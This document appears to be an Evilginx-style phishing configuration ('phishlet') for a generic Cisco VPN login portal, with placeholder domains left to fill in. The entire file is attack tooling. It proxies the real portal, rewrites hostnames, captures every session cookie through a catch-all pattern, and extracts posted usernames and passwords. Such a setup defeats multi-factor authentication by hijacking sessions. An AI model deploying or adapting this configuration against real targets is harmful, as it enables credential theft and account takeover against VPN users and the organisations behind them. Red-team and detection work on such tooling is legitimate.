# Generic Cisco VPN portal phishlet
author: '@fin3ss3g0d'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
sub_filters:
  - {triggers_on: 'subdomainhere.domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.subdomainhere.domainhere'
    keys: ['.*,regexp']
  - domain: 'subdomainhere.domainhere'
    keys: ['.*,regexp']
auth_urls:
  - '/portal.html'
# - '/svc.html'
credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: '^password$'
    search: '(.*)'
    type: 'post'
login:
  domain: 'subdomainhere.domainhere'
  path: '/pathtolandinghere'
